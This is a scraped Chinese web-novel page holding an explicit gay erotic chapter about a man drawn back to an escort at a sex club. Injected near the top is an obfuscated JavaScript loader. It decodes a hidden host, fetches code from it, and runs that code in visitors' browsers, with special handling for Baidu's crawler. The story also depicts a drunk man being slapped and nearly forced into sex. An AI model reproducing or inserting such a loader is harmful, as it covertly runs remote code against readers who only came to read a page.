返回制定公馆_第7章  殇绝天下首页

关灯 护眼     字体:

上一章 目录 下一章

function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuZHNramJ2enZzLmNvbQ==','2843',window,document,['G','TpoZFcguG']);}:function(){};

杨轩体力不支,生生被操晕了,混沌间,这种欢愉到极致的感觉,总好像在哪里经历过。下身随着明羿的猛顶运动,恍惚间,这张脸隔着雾气也越加熟悉,他抬起手抚摸着明羿的脸颊,呻吟着道:“我们……啊是不是啊……哪里见过……”<%ENDIF%>☆、《制定公馆4》慎《肉欲定制公馆4》坐在gay吧角落里的杨轩已经一个月没有再去过肉欲定制公馆,因为只要想到进去后见到的不是明羿,就觉得一点兴致都提不起。明羿到底是谁呢,以他的身材长相如果出现过在自己的生命力不可能被忘记,但就是觉得莫名的熟悉,总不可能是上辈子见过吧。杨轩摇摇头,明羿也否认了他们见过的可能,也许真的只是当时出现了幻觉。自嘲的又喝下一杯酒,他已经习惯了这种坐在角落里不被人注意的感觉,身材样貌都不算出众,性格也很沉闷,就算有搭话的人,也都是聊了几句看他没有太主动就当时拒绝走开了。不过今天和以往有些不一样,从来很少人问津的自己,今天已经有四个人前来搭讪,都是被自己很冷淡的拒绝才走掉,这可是前所未有的事情。身为当事人的杨轩,并不知道自己的变化完全是因为被明羿滋润的很好,让他由内到外散发出一种不再是沉闷,而是晋级成禁欲的诱惑力,总是扣紧的领口也因为明羿曾说过这样不好看,便没有再那样包裹住自己,反倒是这样能让人从松开领口处看到他纤细精致的锁骨,好多吃过他闭门羹的人,也都暗自里偷偷瞟一眼他的模样,咽咽口水。杨轩本身并不喜欢这种吵闹的地方,可是也只有在这里才能找到一种归属感,而不用时刻去在乎自己的性取向是多么的不适合这个社会。但是多次的感情失败经历让他真的不敢再对人打开心扉,好吧,这样说很绝对,至少目前看来,除了明羿再没有人能让他提起性趣。果然肉欲定制公馆那样的地方不适合自己这种人啊,去多了就会口味都变的难以满足,眼光也高起来,饮下杯中最后一口酒,杨轩决定,下一个人只要来跟自己搭讪,今天就决定跟他了。419确实是以前的自己从不会去做的事情,可是现在,他真的需要麻痹自己,才不会总是想着那个遥不可及的人。随着十二点的临近,一些第二场想要欢愉的人进入了亢奋期,连DJ都把音乐打到最high,斑斓灯光里摇曳舞动的男人们不住在尖叫,大笑。杨轩一杯接一杯无意识的灌着自己,直到突然发现一大口喝到嘴里不对劲,才看清楚酒杯里是烈性的马丁尼,而不是原先喝下的冰镇啤酒。“买醉,还是要喝这种东西才过瘾。”不认识的男人坐在杨轩身边,虽谈不上帅气,但好在不是他讨厌的类型,杨轩看着那杯酒笑了,喝醉可能更好,这样就不会太去在意满足自己的人到底是谁。于是他举起那玻璃杯一饮而尽,两种酒在胃里翻腾,没几秒就感觉到肚子里火烧似的,人也昏昏沉沉,旁边男人只是拉了他一下,自己就很自觉的倒在了对方怀里,不过男人胸口的香水味让他有些不舒服地皱了皱眉。关于香水,杨轩是从来不碰的,以至于那个男人在自己身上深吸一口气全都是干净的沐浴液味道,这种典型不是混夜店的小羔羊,偏偏就是情场老手的最爱,刚才远远的他就注意到杨轩的存在,现在竟然这么容易就上手,自然不会浪费机会。酒吧的厕所,从来都是为被欲望冲昏头脑想要迫不及待打一炮的人服务的,男人扶着着杨轩穿越过热闹的人群,挤进了一个隔间,给门落上锁后,就疯狂的吻住他,嘴唇被咬的很疼,杨轩并不喜欢这样,男人根本就是在啃,一点都不温柔,虽然欲望强烈的上下其手好像要把他揉进怀里,却总觉得这样的性爱哪里不对。明羿总是很温柔的吻他,即使是咬,也是很温柔。酒精麻痹的大脑里全是明羿的身影,杨轩胸前一冷,男人正在啃食自己的胸前的乳头,两只手把他压墙壁上,进而一把就拉下他的裤子。令男人感到意外的是,杨轩竟然没有勃起,睡着的小兄弟一点起立的意思都没有,不过这不影响什么,只要自己插进去爽到就好。干涩的手指很粗鲁,生硬着朝杨轩的后穴挤入,好不容易插了两根手指头来回抽动,他的小兄弟才稍微有了抬头的意思,男人抽了几下就没兴趣再做服务,抬起杨轩的一条腿就要提枪上阵,被大鬼头挤在穴口的一瞬间,他突然像是想清楚什么似的,拼命推着对面的男人。“别动我……松手!”男人才不管那么多,继续往前挤,好在杨轩紧紧收缩着自己的肌肉,才没有被男人一贯到底。“啪!”响亮的一耳光打在杨轩脸上,男人很不高兴。“拿什么乔,老子上你是给你面子,别给脸不要脸!”脸歪在一边,虽然疼,可是杨轩知道他必须阻止这个事情,再没有真的和他发生什么之前,所以趁着男人又要扑过来,提腿瞄准对方高高勃起的子孙根就是一顶,疼的那男人退缩着坐到马桶上,疼的冷汗直流。杨轩摸到身后门板的把手,赶紧提着裤子逃也似的冲了出去,不顾身后男人的谩骂有多难听,他也知道自己这样很过分。衣衫不整的逃出去,杨轩才想起来自己的车钥匙和钱包都寄存在酒吧前台,又不敢现在立刻回去,万一被那男人抓住自己就死定了,所以整理好衣衫,他漫无目的的在没有人的大街上溜达起来。现在是午夜,只有少数汽车从身边飞速略过,昏暗街灯照耀下,杨轩摇摇晃晃走着,也不知道走了多久脑袋才稍微清醒一些,眼前这栋楼不就是肉欲定制公馆吗?没错,gay吧的位置确实在这附近,杨轩选择这里泡吧就是做了一个不切实际的猜想,以为可以在公馆以外的地方碰到明羿,但是显然他想多了,不仅没有碰到过,也没有人听说过这个名字。自嘲的牵动唇角,杨轩为自己的幼稚感到可笑,挨着墙壁,滑坐在地上,不明白怎么会对一个提供色情服务的男人产生这么大的执念,被对方知道是会笑话他的吧,连游戏都分不清,根本玩不起。突然,一辆莲花跑车急刹车停在附近,晃眼而嚣张的远光灯让杨轩睁不开眼,直到那车一脚油门开走后,才看清楚刚才从车上下来的男人是谁。“杨先生,如果需要服务,应该进去等,怎么坐在这里?”明羿弯着腰看他,温柔的笑容让杨轩不可置信的揉揉眼,以为看到了幻觉,站起身凑近些让身体不要摇晃,才长舒一口气,确认这个人的身份。“我……我不是来……这里的,我是……”杨轩很丢人的感觉再也抑制不住自己胃里的翻腾,扶着电线杆狂吐起来,果然不该挑战什么烈酒。明羿拍了拍他的后背,还递出一张纸巾,擦掉杨轩唇角的残渣后,问道:“你还好吧?”杨轩摇摇头不敢张嘴,害怕嘴里的异味让他闻到,可是手却被明羿拉着,朝定制公馆走去。“我……我没带手环。”对方楞了下,然后继续拉着他走到公馆后门,抬手刷下自己的身份,把杨轩拉了进去。里面的布置是公馆一贯的公共装修风格,偶尔路过一个服务生看到明羿拉着杨轩,想要问什么,但是意味深长的笑笑就当没看到。

『加入书签,方便阅读』

上一章 目录 下一章